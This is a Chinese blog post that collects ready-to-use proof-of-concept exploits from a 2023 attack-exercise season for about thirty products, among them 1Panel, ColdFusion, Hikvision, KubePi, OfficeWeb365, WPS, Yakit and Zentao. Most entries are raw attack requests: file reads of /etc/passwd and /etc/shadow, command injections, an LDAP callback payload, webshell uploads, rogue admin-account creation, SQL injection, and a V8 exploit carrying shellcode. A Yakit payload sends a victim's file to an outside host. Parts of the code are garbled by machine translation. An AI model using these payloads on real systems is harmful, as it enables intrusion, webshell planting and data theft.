2023HW漏洞POC/EXP、情报汇总知识库(0820更新)

已于 2024-01-25 17:23:24 修改
阅读量1k 收藏 1
点赞数
分类专栏: 网安笔记 文章标签: 网络 安全
于 2023-08-21 10:32:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/galaxylove/article/details/132403256
版权

由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,所涉及工具来自网络,安全性自测。仅用于内部学习研究。

一、2023HW漏洞POC/EXP、情报汇总知识库

1.1Panel后台存在任意文件读取漏洞

漏洞描述

1Panel后台存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感信息文件

POST /api/v1/file/loadfile {"paht":"/etc/passwd"}

2.360 新天擎终端安全管理系统信息泄露漏洞

<http://ip>:port/runtime/admin_log_conf.cache

3.Adobe ColdFusion 反序列化漏洞CVE-2023-29300

POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1
Host: 1.2.3.4:1234
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 400
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
cmd: id

argumentCollection=
<wddxPacket version='1.0'>
    <header/>
    <data>
        <struct type='xcom.sun.rowset.JdbcRowSetImplx'>
            <var name='dataSourceName'>
                <string>ldap://xxx.xxx.xxx:1234/Basic/TomcatEcho</string>
            </var>
            <var name='autoCommit'>
                <boolean value='true'/>
            </var>
        </struct>
    </data>
</wddxPacket>

4.CODING平台idna目录存在目录遍历漏洞

CODing.net是一个面向开发者的云端开发平台,提供 Git/SVN 代码托管、任务管理,在idna存在目录泄露漏洞,攻击者可获取目录文件信息。

检索条件: title="一站式软件研发管理平台"

relative: req0
session: false
requests:
- method: GET
timeout: 10
path: /ci/pypi/simple/idna/
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.2786.81 Safari/537.36
follow_redirects: true
matches: (code.eq("200") && body.contains("Index of"))

5.Coremail 邮件系统未授权访问获取管理员账密

POC:

/coremail/common/assets/:/:/:/:/:/:/s?

biz=Mzl3MTk4NTcyNw==&mid=2247485877&idx=1&sn=7e5f77db320ccf9013c0b7aa7262

6688chksm=eb3834e5dc4fbdf3a9529734de7e6958e1b7efabecd1c1b340c53c80299ff5c688b

f6adaed61&scene=2

6.Eramba任意代码执行漏洞

0x01 漏洞详情

CVE-2023-36255

  • *漏洞类型:**远程代码执行
  • *影响:**接管服务器
  • *简述:**Eramba存在远程代码执行漏洞,允许经过身份验证的用户执行任意代码。

0x02 影响版本

  • Enterprise and Community edition <= 3.19.1
GET /settings/download-test-pdf?path=ip%20a; HTTP/1.1
Host: [redacted]
Cookie: translation=1; csrfToken=1l2rXXwj1D1hVyVRH%2B1g%2BzIzYTA3OGFiNWRjZWVmODQ1OTU1NWEyODM2MzIwZTZkZTVlNmU1YjY%3D; PHPSESSID=14j6sfroe6t2g1mh71g2a1vjg8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://[redacted]/settings
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close


HTTP/1.1 500 Internal Server Error
Date: Fri, 31 Mar 2023 12:37:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Access-Control-Allow-Origin: *
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Disposition: attachment; filename="test.pdf"
X-DEBUGKIT-ID: d383f6d4-6680-4db0-b574-fe789abc1718
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2033469

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Error: The exit status code '127' says something went wrong:
stderr: &quot;sh: 1: --dpi: not found
&quot;
stdout: &quot;1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens33: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether [redacted] brd ff:ff:ff:ff:ff:ff
    inet [redacted] brd [redacted] scope global ens33
       valid_lft forever preferred_lft forever
    inet6 [redacted] scope link
       valid_lft forever preferred_lft forever
&quot;
command: ip a; --dpi '90' --lowquality --margin-bottom '0' --margin-left '0'
--margin-right '0' --margin-top '0' --orientation 'Landscape'
--javascript-delay '1000' '/tmp/knp_snappy6426d4231040e1.91046751.html'
'/tmp/knp_snappy6426d423104587.46971034.pdf'. </title>

[...]

7.gitlab路径遍历读取任意文件漏洞

可能需要登录

GET /group1/group2/group3/group4/group5/group6/group7/group8/group9/project9/uploads/4e02c376ac758e162ec674399741e38d//..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

8.HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞

<?php
          $file_name = $_GET['fileName'];
          $file_path = '../../../log/'.$file_name;
          $fp = fopen($file_path, "r");
          while($line = fgets($fp)){
            $line = nl2br(htmlentities($line, ENT_COMPAT, "utf-8"));
            echo '<span style="font-size:16px">'.$line.'</span>';
          }
          fclose($fp);
?>


/serverLog/showFile.php?fileName=../web/html/main.php

9.HiKVISION 综合安防管理平台 env 信息泄漏漏洞

/artemis-portal/artemis/env

10.Hytec Inter HWL-2511-SS popen.cgi命令注入漏洞

title="index" && header="lighttpd/1.4.30"


/cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;cat%20/etc/shadow&v=0.1303033443137912

10.Jeecg-Boot Freemarker 模版注入漏洞

11.KubePi JwtSigKey 登陆绕过漏洞(CVE-2023-22463)

漏洞描述

KubePi 中存在 JWT 硬编码,攻击者通过硬编码可以获取服务器后台管理权限,添加任意用户

漏洞影响

库贝派

网络测绘

“库贝皮”

POST /kubepi/api/v1/users HTTP/1.1
Host: {
  {Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.127 Safari/537.36
accept: application/json
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfX0.XxQmyfq_7jyeYvrjqsOZ4BB4GoSkfLO2NvbKCEQjld8

{
  "authenticate": {
       "password": "{
  {randstr}}"
  },
  "email": "{
  {randstr}}@qq.com",
  "isAdmin": true,
  "mfa": {
          "enable": false
   },
  "name": "{
  {randstr}}",
  "nickName": "{
  {randstr}}",
  "roles": [
       "Supper User"
  ]
}

12.Kuboard默认口令

漏洞描述:

Kuboard,是一款免费的 Kubernetes 图形化管理工具,Kuboard 力图帮助用户快速在 Kubernetes 上落地微服务。Kuboard存在默认口令可以通过默认口令登录Kuboard,管理Kubernetes。

admin/kuboard123

13LiveBos ShowImage.do文件imgName参数读取漏洞

/feed/ShowImage.do;.js.jsp?type=&imgName=../../../../../../../../../../../../../../../etc/passwd

13.Milesight VPN server.js 任意文件读取漏洞

POC:

GET /../etc/passwd HTTP/1.1

Host:

Accept: /

Content-Type: application/x-www-form-urlencoded

14.Nacos-Sync

漏洞成因

没进行权限校验。

影响范围:Nacos-Sync 3.0

fofa发现

title="nacos" &amp;&amp; title=="Nacos-Sync"

路径拼接

/#/serviceSync

利用方式

访问之后直接是进入后台的样子~

15.nginx配置错误导致的路径穿越风险

漏洞自查PoC如下: GitHub - hakaioffsec/navgix: navgix is a multi-threaded golang tool that will check for nginx alias traversal vulnerabilities 该漏洞非0day,是一个路径穿越漏洞,可以直接读取nginx后台服务器文件。 有多家重点金融企业已中招,建议尽快进行自查。

16.OfficeWeb365 远程代码执行漏洞

【消息详情】:360漏洞云监测到网传《OfficeWeb365 远程代码执行漏洞》的消息,经漏洞云复核,确认为【真实】漏洞,漏洞影响【未知】版本,该漏洞标准化POC已经上传漏洞云情报平台,平台编号:360LDYLD-2023-00002453,情报订阅用户可登录漏洞云情报平台( 360漏洞云平台 )查看漏洞详情。

360漏洞云监测到网传《OfficeWeb365远程代码执行漏洞》的消息,经漏洞云复核,确认为【真实】漏洞,漏洞影响【未知】版本,该漏洞标准化POC已经升级漏洞云情报平台,平台编号: 360LDYLD-2023-00002453

\# 详细

POST /PW/SaveDraw?path=../../Content/img&idx=1.aspx HTTP/1.1
主持人:xxx
用户代理:Mozilla/5.0(Macintosh;Intel Mac OS X 10_15_7)AppleWebKit/537.36(KHTML,如 Gecko)Chrome/88.0.434.18 Safari/537.36
内容长度:2265
内容类型:application/x-www-form-urlencoded
接受编码:gzip、deflate
连接:关闭
数据:image/png;base64,01s34567890123456789y12345678901234567m91<%@ 页面语言="C#" %>
    <%@Import 命名空间="System.Reflection" %>
    <脚本运行=“服务器”>
               私有字节[]解密(字节[]数据)
        {
            字符串键=“e45e329feb5d925b”;
            数据 = Convert.FromBase64String(System.Text.Encoding.UTF8.GetString(data));
            System.Security.Cryptography.RijndaelManaged aes = new System.Security.Cryptography.RijndaelManaged();
            aes.Mode = System.Security.Cryptography.CipherMode.ECB;
            aes.Key = Encoding.UTF8.GetBytes(key);
            aes.Padding = System.Security.Cryptography.PaddingMode.PKCS7;
            return aes.CreateDecryptor().TransformFinalBlock(data, 0, data.Length);
        }
        私有字节[]加密(字节[]数据)
        {
            字符串键=“e45e329feb5d925b”;
            System.Security.Cryptography.RijndaelManaged aes = new System.Security.Cryptography.RijndaelManaged();
            aes.Mode = System.Security.Cryptography.CipherMode.ECB;
            aes.Key = Encoding.UTF8.GetBytes(key);
            aes.Padding = System.Security.Cryptography.PaddingMode.PKCS7;
            返回 System.Text.Encoding.UTF8.GetBytes(Convert.ToBase64String(aes.CreateEncryptor().TransformFinalBlock(data, 0, data.Length)));
        }
    </脚本>
        <%
        //byte[] c=Request.BinaryRead(Request.ContentLength);Assembly.Load(Decrypt(c)).CreateInstance("U").Equals(this);
                byte[] c=Request.BinaryRead(Request.ContentLength);
          string asname=System.Text.Encoding.ASCII.GetString(new byte[] {0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x52,0x65,0x66,0x6c,0x65,0x63,0x74,0x69,0x6f, 0x6e,0x2e,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79});
          类型程序集=Type.GetType(asname);
           MethodInfo load = assembly.GetMethod("Load",new Type[] {new byte[0].GetType()});
           对象 obj=load.Invoke(null, new object[]{Decrypt(c)});
           MethodInfo create = assembly.GetMethod("CreateInstance",new Type[] { "".GetType()});
           字符串名称 = System.Text.Encoding.ASCII.GetString(new byte[] { 0x55 });
           object pay=create.Invoke(obj,new object[] { name });
           pay.Equals(this);%>>---

17.Openfire身份认证绕过漏洞

GET
/user-create.jsp?csrf=Sio3WOA89y2L9Rl&username=user1&name=&email=&password=Qwer1234&passwordConfirm=Qwer1234&isadmin=on&create=............
 HTTP/1.1

18.Panabit iXCache网关RCE漏洞CVE-2023-38646

POST /cgi-bin/Maintain/date_config HTTP/1.1
Host: 127.0.0.1:8443
Cookie: pauser_9667402_260=paonline_admin_44432_9663; pauser_9661348_661=paonline_admin_61912_96631
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 107

ntpserver=0.0.0.0%3Bwhoami&year=2000&month=08&day=15&hour=11&minute=34&second=53&ifname=fxp1

19.Panel loadfile 后台文件读取漏洞

POST /api/v1/file/loadfile {"paht":"/etc/passwd"}

20.PigCMS action_flashUpload 任意文件上传漏洞

POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload
HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----aaa
------aaa
Content-Disposition: form-data; name="filePath"; filename="test.php"
Content-Type: video/x-flv
<?php phpinfo();?>
------aaa

/cms/upload/images/2023/08/11/1691722887xXbx.php

21.QAX-Vpn存在x遍历及任意账号密码修改漏洞

<https://x.xxx.xxx.cn/admin/group/x_group.php?id=1>
<https://x.xxx.xxx.cn/admin/group/x_group.php?id=3>
cookie: admin id=1; gw admin ticket=1;

22.Smart S85F 任意文件读取

GET /log/decodmail.php?file=L2V0Yy9gc2xlZXAke0lGU30xMGAucGNhcA== HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=c36d5527fd784aa29748b3b1c50be7bc
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

23.WPS RCE

wps影响范围为:WPS Office 2023 个人版 < 11.1.0.15120

WPS Office 2019 企业版 < 11.8.2.12085

POC

在1.html当前路径下启动http server并监听80端口,修改hosts文件(测试写死的)

127.0.0.1 clientweb.docer.wps.cn.cloudwps.cn

漏洞触发需让域名规则满足clientweb.docer.wps.cn.{xxxxx}wps.cn cloudwps.cn和wps.cn没有任何关系

代码块在底下。(需要原pdf加wechat)

<script>

if(typeof alert === "undefined"){

alert = console.log;

}

let f64 = new Float64Array(1);

let u32 = new Uint32Array(f64.buffer);

function d2u(v) {

f64[0] = v;

return u32;

}

function u2d(lo, hi) {

u32[0] = lo;

u32[1] = hi;

return f64[0];

}

function gc(){ // major

for (let i = 0; i < 0x10; i++) {

new Array(0x100000);

}

}

function foo(bug) {

function C(z) {

Error.prepareStackTrace = function(t, B) {

return B[z].getThis();

};

let p = Error().stack;

Error.prepareStackTrace = null;

return p;

}

function J() {}

var optim = false;

var opt = new Function(

'a', 'b', 'c',

'if(typeof a===\\\\'number\\\\'){if(a>2){for(var

i=0;i<100;i++);return;}b.d(a,b,1);return}' +

'g++;'.repeat(70));

var e = null;

J.prototype.d = new Function(

'a', 'b', '"use strict";b.a.call(arguments,b);return arguments[a];');

J.prototype.a = new Function('a', 'a.b(0,a)');

J.prototype.b = new Function(

'a', 'b',

'b.c();if(a){' +

'g++;'.repeat(70) + '}');

J.prototype.c = function() {

if (optim) {

var z = C(3);

var p = C(3);

z[0] = 0;

e = {M: z, C: p};

}

};

var a = new J();

// jit optim

if (bug) {

for (var V = 0; 1E4 > V; V++) {

opt(0 == V % 4 ? 1 : 4, a, 1);

}

}

optim = true;

opt(1, a, 1);

return e;

}

e1 = foo(false);

e2 = foo(true);

delete e2.M[0];

let hole = e2.C[0];

let map = new Map();

map.set('asd', 8);

map.set(hole, 0x8);

map.delete(hole);

map.delete(hole);

map.delete("asd");

map.set(0x20, "aaaa");

let arr3 = new Array(0);

let arr4 = new Array(0);

let arr5 = new Array(1);

let oob_array = [];

oob_array.push(1.1);

map.set("1", -1);

let obj_array = {

m: 1337, target: gc

};

let ab = new ArrayBuffer(1337);

let object_idx = undefined;

let object_idx_flag = undefined;

let max_size = 0x1000;

for (let i = 0; i < max_size; i++) {

if (d2u(oob_array[i])[0] === 0xa72) {

object_idx = i;

object_idx_flag = 1;

break;

}if (d2u(oob_array[i])[1] === 0xa72) {

object_idx = i + 1;

object_idx_flag = 0;

break;

}

}

function addrof(obj_para) {

obj_array.target = obj_para;

let addr = d2u(oob_array[object_idx])[object_idx_flag] - 1;

obj_array.target = gc;

return addr;

}

function fakeobj(addr) {

let r8 = d2u(oob_array[object_idx]);

if (object_idx_flag === 0) {

oob_array[object_idx] = u2d(addr, r8[1]);

}else {

oob_array[object_idx] = u2d(r8[0], addr);

}

return obj_array.target;

}

let bk_idx = undefined;

let bk_idx_flag = undefined;

for (let i = 0; i < max_size; i++) {

if (d2u(oob_array[i])[0] === 1337) {

bk_idx = i;

bk_idx_flag = 1;

break;

}if (d2u(oob_array[i])[1] === 1337) {

bk_idx = i + 1;

bk_idx_flag = 0;

break;

}

}

let dv = new DataView(ab);

function get_32(addr) {

let r8 = d2u(oob_array[bk_idx]);

if (bk_idx_flag === 0) {

oob_array[bk_idx] = u2d(addr, r8[1]);

} else {

oob_array[bk_idx] = u2d(r8[0], addr);

}

let val = dv.getUint32(0, true);

oob_array[bk_idx] = u2d(r8[0], r8[1]);

return val;

}

function set_32(addr, val) {

let r8 = d2u(oob_array[bk_idx]);

if (bk_idx_flag === 0) {

oob_array[bk_idx] = u2d(addr, r8[1]);

} else {

oob_array[bk_idx] = u2d(r8[0], addr);

}

dv.setUint32(0, val, true);

oob_array[bk_idx] = u2d(r8[0], r8[1]);

}

function write8(addr, val) {

let r8 = d2u(oob_array[bk_idx]);

if (bk_idx_flag === 0) {

oob_array[bk_idx] = u2d(addr, r8[1]);

} else {

oob_array[bk_idx] = u2d(r8[0], addr);

}

dv.setUint8(0, val);

}

let fake_length = get_32(addrof(oob_array)+12);

set_32(get_32(addrof(oob_array)+8)+4,fake_length);

let wasm_code = new

Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,

128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,

128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0

,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);

let wasm_mod = new WebAssembly.Module(wasm_code);

let wasm_instance = new WebAssembly.Instance(wasm_mod);

let f = wasm_instance.exports.main;

let target_addr = addrof(wasm_instance)+0x40;

let rwx_mem = get_32(target_addr);

//alert("rwx_mem is"+rwx_mem.toString(16));

const shellcode = new Uint8Array([0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89,

0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30,0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14,

0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff,0xac, 0x3c, 0x61, 0x7c,

0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2, 0x52,0x57, 0x8b,

0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x48, 0x01,

0xd1,0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3, 0x3a, 0x49,

0x8b, 0x34, 0x8b,0x01, 0xd6, 0x31, 0xff, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7,

0x38, 0xe0, 0x75, 0xf6, 0x03,0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe4, 0x58,

0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b,0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01,

0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24,0x24, 0x5b, 0x5b, 0x61,

0x59, 0x5a, 0x51, 0xff, 0xe0, 0x5f, 0x5f, 0x5a, 0x8b, 0x12, 0xeb,0x8d, 0x5d,

0x6a, 0x01, 0x8d, 0x85, 0xb2, 0x00, 0x00, 0x00, 0x50, 0x68, 0x31, 0x8b,

0x6f,0x87, 0xff, 0xd5, 0xbb, 0xe0, 0x1d, 0x2a, 0x0a, 0x68, 0xa6, 0x95, 0xbd,

0x9d, 0xff, 0xd5,0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb,

0x47, 0x13, 0x72, 0x6f, 0x6a,0x00, 0x53, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63,

0x00]);

for(let i=0;i<shellcode.length;i++){

write8(rwx_mem+i,shellcode[i]);

}

f();

</script>

需要将在1.html当前路径下启动http server并监听80端口,修改hosts文件(测试写死的)

127.0.0.1 clientweb.docer.wps.cn.cloudwps.cn

漏洞触发需让域名规则满足clientweb.docer.wps.cn.{xxxxx}wps.cn即可,cloudwps.cn和wps.cn没有任何关系。正常攻击,也可以使用clientweb.docer.wps.cn.hellowps.cn.

24.yakit任意文件读取

详情可参考原文 有截图复现 原文链接:【漏洞复现】Yakit任意文件读取

前言: yakit是近年新兴的一个BurpSuite平替工具,和burp的区别就在于数据包放过去不用配置ip端口协议这些,但是yakit跑起来感觉卡卡的,远不如burp那么流畅,近期yakit爆出了一个任意文件读取漏洞,此漏洞通过在网页嵌入js代码实现读取yakit使用者设备上的文件 触发版本: 引擎版本< Yaklang 1.2.4-sp2 漏洞条件: 使用yakit的MITM代理并且启用任意插件

Pyload:
<script>
  const xhr = new XMLHttpRequest();
  xhr.open("POST", "<http://yakit.com/filesubmit>");
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  xhr.send(`file={
  {base64enc(file(C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\etc\\\\\\\\hosts))}}`);
</script>


监听脚本
#! /bin/python3
import socket

# 监听地址和端口

host = '0.0.0.0'
port = 23800

# 创建socket服务器

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

# 绑定并监听端口

server.bind((host, port))
server.listen()

# 接收连接并监听请求

print("Listening...")
while True:
    # 接收客户端连接请求
    client, address = server.accept()
    print(f"Connected by {address}")

    # 读取客户端请求数据
    request = ''
    while True:
        input_data = client.recv(1024).decode('utf-8')
        request += input_data
        if len(input_data) < 1024:
            break

    # 提取请求头部
    headers = request.split('\\\\n')
    print("Received headers:")
    for header in headers:
        print(header)

    # 关闭客户端连接
    client.close()

复现开始: 创建一个html页面并插入payload

启用MITM代理,不启用插件进行访问:
<https://mmbiz.qpic.cn/sz_mmbiz_png/OF9Ieq8TATc71LlcBt5FGOn2ibomGw7wMXX7dh9j86aZ7JA0WMoxwHSDdAwnMVSZLoF09zuiamTpkibBtLto8y8KA/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1>
启用MITM代理并启用插件进行访问:
<https://mmbiz.qpic.cn/sz_mmbiz_png/OF9Ieq8TATc71LlcBt5FGOn2ibomGw7wM1RvwO5nnYhpX3aKZeCDdziaCEcOSDfbIcu2wNe27x7aTsPgBXo8KTsQ/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1>

原理:yakit默认不会对经过MITM代理的流量中的fuzztag进行解析,但是经过插件时会被解析,所以这也是利用限制。

25.安恒明御安全网关rce

GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1|echo+"<%3fphp+eval(\\\\$_POST[\\\\"a\\\\"]);?>"+>+.xxx.php HTTP/1.1
Host: xxx
Cookie: USGSESSID=495b895ddd42b82cd89a29f241825081
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10 16 0) Applewebkit/537.36 (KHTML likeGecko) Chrome/78.0.3994.108 Safari/537.36
Sec-Fetch-User: ?1
Accept:
text/html,application/xhtml+xml,application/xml;g=0.9,image/webp,image/apng,*/*;g=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

木马地址: http://xxx/webui/.xxx.php

26.安恒明御运维审计与风险控制系统堡垒机任意用户注册

POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1
Host: xxx
Cookie: LANG=zh; USM=0a0e1f29d69f4b9185430328b44ad990832935dbf1b90b8769d297dd9f0eb848
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 1121

<?xml version="1.0"?>
<methodCall>
<methodName>web.user_add</methodName>
<params>
<param>
<value>
<array>
<data>
<value>
<string>admin</string>
</value>
<value>
<string>5</string>
</value>
<value>
<string>XX.XX.XX.XX</string>
</value>
</data>
</array>
</value>
</param>
<param>
<value>
<struct>
<member>
<name>uname</name>
<value>
<string>deptadmin</string>
</value>
</member>
<member>
<name>name</name>
<value>
<string>deptadmin</string>
</value>
</member>
<member>
<name>pwd</name>
<value>
<string>Deptadmin@123</string>
</value>
</member>
<member>
<name>authmode</name>
<value>
<string>1</string>
</value>
</member>
<member>
<name>deptid</name>
<value>
<string></string>
</value>
</member>
<member>
<name>email</name>
<value>
<string></string>
</value>
</member>
<member>
<name>mobile</name>
<value>
<string></string>
</value>
</member>
<member>
<name>comment</name>
<value>
<string></string>
</value>
</member>
<member>
<name>roleid</name>
<value>
<string>101</string>
</value>
</member>
</struct></value>
</param>
</params>
</methodCall>

27.百卓 Smart S85F 后台文件上传漏洞

POST /useratte/web.php? HTTP/1.1
Host: xx.xx.xx.xx:8443
Cookie: PHPSESSID=xxxxx
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 598
Upgrade-Insecure-Requests: 1
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?=phpinfo();
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328—

28.百卓Smart S45F命令执行

构造URL :/importhtml.php?type=exporthtmlmail&amp;tab=tb_RCtrlLog&amp;sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvc3lzMS5waHAn

构造poc:
POST /app/sys1.php HTTP/1.1
Host: 60.22.74.195:8443
Cookie:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests:
1Sec-Fetch-Dest:
documentSec-Fetch-Mode:
navigateSec-Fetch-Site:
noneSec-Fetch-User: ?1Te: trailers
Connection: close
Content-Type: application/x-www-form-url
encodedContent-Length: 6

cmd=id

29.禅道 16.5 router.class.php SQL注入漏洞

POST /user-login.html

   account=admin%27+and+%28select+extractvalue%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%29%29%23

30.禅道18.0~18.3 backstage命令注入

posT /zentaopms/www/index.php?m=zahost&f=create HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win4; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json,text/javascript,*/*; g=0.01
Accept-Language: zh-CN,zh;g=0.8,zh-Tw;g=0.7,zh-HK;g=0.5,en-US;g=0.3,en;g=0.2
Accept-Encoding: gzip, deflate
Referer: <http://127.0.0.1/zentaopms/www/index.php?m=zahost&f=create>
